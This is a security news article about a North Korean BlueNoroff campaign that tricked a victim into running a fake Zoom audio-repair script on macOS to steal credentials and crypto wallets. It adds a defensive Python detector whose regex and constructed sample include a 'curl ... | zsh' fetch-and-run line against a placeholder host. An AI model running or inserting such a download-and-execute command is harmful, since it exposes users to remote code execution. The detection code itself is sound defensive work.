BlueNoroff Hackers Use Zoom App to Launch Infostealer Malware in Targeted Attacks


The Field Effect Analysis team identified a targeted scam associated with BlueNoroff, a North Korean hacker subgroup. A known Canadian gambling company was caught in this scheme, which employed trusted identity verification methods and Zoom. BlueNoroff’s sophisticated method included fake domains such as zoom-tech[.]us to target the victim during a meeting about cryptocurrency.

Attackers claimed there were audio problems and asked the victim to run a script presented as a Zoom audio repair file. According to the official report, the script contained thousands of blank lines to hide its actual, harmful commands. Hidden malware soon followed, enabling the theft of sensitive data, including login credentials and browser account profiles.

This attack combined technical precision with psychological pressure and deception. First, the victim was directed to zoom-tech[.]us, which WHOIS records show was registered on April 14, 2025. The investigation found that this domain is connected to others registered with the same misleading WHOIS data. When triggered, the script used CURL and ZSH to fetch additional files and a password-harvesting payload.
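As an added example, not taken from Field Effect's report: a small Python check that flags a shell script padded with long runs of blank lines before its real commands, and notes whether those commands pipe remote content into a shell, which is the pattern described above. The sample script contents and the threshold are constructed for illustration.

```python
import re

# Threshold is an assumption chosen for illustration, not a value from the report.
MIN_BLANK_RUN = 100
# Matches a download piped straight into an interpreter, e.g. "curl ... | zsh".
FETCH_PATTERN = re.compile(r"\b(curl|wget)\b.*\|\s*(zsh|bash|sh)\b")

def analyze_script(text: str) -> dict:
    """Return padding and fetch indicators for a shell script's text."""
    lines = text.splitlines()
    longest_run = current = 0
    for line in lines:
        if line.strip() == "":
            current += 1
            longest_run = max(longest_run, current)
        else:
            current = 0
    non_blank = [ln for ln in lines if ln.strip()]
    pipes_to_shell = [ln for ln in non_blank if FETCH_PATTERN.search(ln)]
    return {
        "total_lines": len(lines),
        "non_blank_lines": len(non_blank),
        "longest_blank_run": longest_run,
        "padded": longest_run >= MIN_BLANK_RUN,
        "pipes_remote_to_shell": len(pipes_to_shell) > 0,
    }

def is_suspicious(text: str) -> bool:
    """Flag scripts that both hide commands behind padding and fetch-and-run remote code."""
    result = analyze_script(text)
    return result["padded"] and result["pipes_remote_to_shell"]

# Constructed sample: a benign-looking header, thousands of blank lines, then a fetch-and-run line.
SAMPLE_PADDED = (
    "#!/bin/zsh\n# Zoom audio fix\necho 'Checking audio...'\n"
    + "\n" * 3000
    + "curl -fsSL https://example.invalid/payload.sh | zsh\n"
)
# Constructed sample: a short, ordinary script with no padding.
SAMPLE_CLEAN = "#!/bin/zsh\necho 'hello'\n"

if __name__ == "__main__":
    print(analyze_script(SAMPLE_PADDED))
    print("suspicious:", is_suspicious(SAMPLE_PADDED), is_suspicious(SAMPLE_CLEAN))
```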

BlueNoroff Malware Campaign Targets Crypto Wallets with Stealthy macOS Attacks

Stolen user account passwords were exfiltrated during this step, indicating credential theft. A LaunchDaemon was then installed so the malware would run persistently whenever the system started. The malware used names such as “Wi-Fi Updater” and injected its code into other macOS processes using special entitlements. Meanwhile, it used separate routines to collect browser data, system information, and keychain files with RSYNC and CURL.

Cryptocurrency wallets in browsers such as Brave were targeted in these parallel collection stages. Working from temporary directories and deleting files after execution kept the malware's footprint small and made it hard to trace. Attackers used C2 domains such as ajayplamingo[.]com and zmwebsdk[.]com to exfiltrate stolen data from the device. This campaign has been active since at least March 2025 and continues to target cryptocurrency operators.

BlueNoroff’s operations have expanded across North America, South Korea, Japan, and Europe, underlining a global financial motive. Cybersecurity teams should watch for the indicators described above, block unapproved scripts, and train users to resist social engineering.
